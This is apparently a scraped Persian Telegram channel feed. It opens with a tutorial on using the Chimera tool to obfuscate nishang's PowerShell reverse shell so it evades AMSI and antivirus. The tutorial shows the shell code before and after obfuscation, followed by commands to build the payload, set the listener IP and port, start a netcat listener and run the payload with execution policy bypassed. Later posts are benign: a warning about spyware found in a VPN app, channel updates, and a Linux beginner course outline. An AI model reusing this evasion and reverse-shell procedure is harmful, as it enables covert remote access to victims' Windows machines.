ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
1. نصب پیش نیاز ها :
1. ساخت Payload :
1.2 تغییر ایپی :
پورت دیفالت اسکریپت 444 هستش :
1. ایجاد Listener در لینوکس با NetCat :
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
➖➖➖➖➖➖➖➖
✅ نحوه ی نصب در Linux :1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
2. کلون کردن ریپو :sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) : sudo chown root:root -R /opt/chimera/
4. تغییر مسیر به opt/chimera/ :cd /opt/chimera/
5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :sudo chmod +x chimera.sh
6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :./chimera.sh —help
➖➖➖➖➖➖➖➖
✅ نحوه ی استفاده از اسکریپت :1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1
2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1
➖➖➖➖➖➖➖➖
✅ گرفتن دسترسی :1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :powershell.exe -ep bypass C:\<PATH>\Payload.ps1
و تمام.امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
GitHub
nishang/Shells/Invoke-PowerShellTcp.ps1 at master · samratashok/nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security. - samratashok/nishang
❤4👍1
https://news.1rj.ru/str/+NgSIMFDC0K00NWNk
🔸 گروه کافه لینوکس ، سوالی دارید بپرسید جواب میدم ، باعث پیشرفت همدیگه باشیم .
🔹 مخ زنی ممنوع
🔸 گروه کافه لینوکس ، سوالی دارید بپرسید جواب میدم ، باعث پیشرفت همدیگه باشیم .
🔹 مخ زنی ممنوع
اگر از سرویس وی پی ان 20Speed استفاده میکنید هرچه سریع تر اون رو پاک کنید به گزارش بیت دیفندر این vpn حاوی بدافزار و کی لاگر هست
https://www.bitdefender.com/blog/labs/eyespy-iranian-spyware-delivered-in-vpn-installers/
https://www.bitdefender.com/blog/labs/eyespy-iranian-spyware-delivered-in-vpn-installers/
Bitdefender Labs
EyeSpy - Iranian Spyware Delivered in VPN Installers
Consumer VPN solutions have witnessed explosive growth in the past few years.
👍8
درود دوستان ، چنل از عرش به فرش رسیده . ولی درست میشه .
من دوره رایگان رکورد کردم ، جذب کانال خوب شده بود ، یه بنده خدایی زورش اومد این کارو کرد .
اهمیت نداره من به کار خودم ادامه میدم ، شما هم حمایت کنید ❤️
من دوره رایگان رکورد کردم ، جذب کانال خوب شده بود ، یه بنده خدایی زورش اومد این کارو کرد .
اهمیت نداره من به کار خودم ادامه میدم ، شما هم حمایت کنید ❤️
👍20❤3🔥3😢1
Cafe Linux pinned «درود دوستان ، چنل از عرش به فرش رسیده . ولی درست میشه . من دوره رایگان رکورد کردم ، جذب کانال خوب شده بود ، یه بنده خدایی زورش اومد این کارو کرد . اهمیت نداره من به کار خودم ادامه میدم ، شما هم حمایت کنید ❤️»
سلام دوستان ، با پوزش به دلیل به فنا رفتن کانال میخوام بگم که احتمال زیاد کانال میره رو mod کتاب و pdf و پادکست تا زمانی که ممبرا برگردن 💔 .
فیلم ها حتما ادامه پیدا میکنه نگران نباشید ، دوره های بیشتر هم حتما بعد از این دوره رکورد خواهد شد . داخل کانال بمونید و حمایت کنید . به امید روز بهتر ☃️♥️ .
فیلم ها حتما ادامه پیدا میکنه نگران نباشید ، دوره های بیشتر هم حتما بعد از این دوره رکورد خواهد شد . داخل کانال بمونید و حمایت کنید . به امید روز بهتر ☃️♥️ .
❤11👍4💔4
سرفصل دوره لینوکس برای نوب ها ، کافه لینوکس :
پادکست اول : تاریخچه لینوکس
پادکست دوم : تاریخچه لینوکس و نگاهی به اوپن سورس
پادکست سوم : توزیع ها در لینوکس و نگاهی به توزیع REDHAT .
پادکست چهارم ( آخر ) : توزیع ها در لینوکس
اولین پست من داخل مدیوم ، درمورد تاریخچه لینوکس
ویدیو های لینوکس اسنشیال ، کافه لینوکس :
فیلم اول : نگاهی به سایت اوپن سورس و تایم لاین دیسترو های لینوکس و . . .
فیلم دوم : مدارکی که داخل لینوکس میتونید بگیرید ، شرایطش و اینکه کجا برید چکار کنید ، درمورد desktop environment ها حرف زدم و گفتم که shell چیه و اولین دستور خودتونو وارد کردید .
فیلم سوم : اولین دستوراتمون رو وارد کردیم
فیلم چهارم : کار کردن با فایل ها ، داخل فایل رو ببینید بدون اینکه بخواید بازش کنید ، page by page دیدن فایل ها و . .
فیلم پنجم : کپی کنید ، move کنید و اسمو عوض کنید و مبحث مهم Redirection داخل این ویدیو توضیح داده شد ، یه آهنگ هم ساختیم ، 0 و 1 های سه تا آهنگو همرو ریختیم تو یدونه فایل و . . . .
اون آهنگی که درست کردیم اینه
فیلم ششم : تا الان فقط فایل رو می دیدید ، الان فایل رو مینویسید :) با vim و nano آشنا شدیم و دیدیم چجوری کار میکنن .
فیلم هفتم : سخت افزار چجوری کار میکنه ، چجوری firmware کار میکنه و اصلا چی هست ، انواعشون رو گفتم . Bootloader چیه و کرنل رو چجوری لود میکنه و کرنل چجوری بقیه پروسس هارو اجرا میکنه رو نشونتون دادم .
لینک گروه کافه لینوکس .
این داستان ادامه دارد
پادکست اول : تاریخچه لینوکس
پادکست دوم : تاریخچه لینوکس و نگاهی به اوپن سورس
پادکست سوم : توزیع ها در لینوکس و نگاهی به توزیع REDHAT .
پادکست چهارم ( آخر ) : توزیع ها در لینوکس
اولین پست من داخل مدیوم ، درمورد تاریخچه لینوکس
ویدیو های لینوکس اسنشیال ، کافه لینوکس :
فیلم اول : نگاهی به سایت اوپن سورس و تایم لاین دیسترو های لینوکس و . . .
فیلم دوم : مدارکی که داخل لینوکس میتونید بگیرید ، شرایطش و اینکه کجا برید چکار کنید ، درمورد desktop environment ها حرف زدم و گفتم که shell چیه و اولین دستور خودتونو وارد کردید .
فیلم سوم : اولین دستوراتمون رو وارد کردیم
فیلم چهارم : کار کردن با فایل ها ، داخل فایل رو ببینید بدون اینکه بخواید بازش کنید ، page by page دیدن فایل ها و . .
فیلم پنجم : کپی کنید ، move کنید و اسمو عوض کنید و مبحث مهم Redirection داخل این ویدیو توضیح داده شد ، یه آهنگ هم ساختیم ، 0 و 1 های سه تا آهنگو همرو ریختیم تو یدونه فایل و . . . .
اون آهنگی که درست کردیم اینه
فیلم ششم : تا الان فقط فایل رو می دیدید ، الان فایل رو مینویسید :) با vim و nano آشنا شدیم و دیدیم چجوری کار میکنن .
فیلم هفتم : سخت افزار چجوری کار میکنه ، چجوری firmware کار میکنه و اصلا چی هست ، انواعشون رو گفتم . Bootloader چیه و کرنل رو چجوری لود میکنه و کرنل چجوری بقیه پروسس هارو اجرا میکنه رو نشونتون دادم .
لینک گروه کافه لینوکس .
این داستان ادامه دارد
👍11❤4😁2👏1
Cafe Linux pinned «سرفصل دوره لینوکس برای نوب ها ، کافه لینوکس : پادکست اول : تاریخچه لینوکس پادکست دوم : تاریخچه لینوکس و نگاهی به اوپن سورس پادکست سوم : توزیع ها در لینوکس و نگاهی به توزیع REDHAT . پادکست چهارم ( آخر ) : توزیع ها در لینوکس اولین پست من داخل مدیوم ، درمورد…»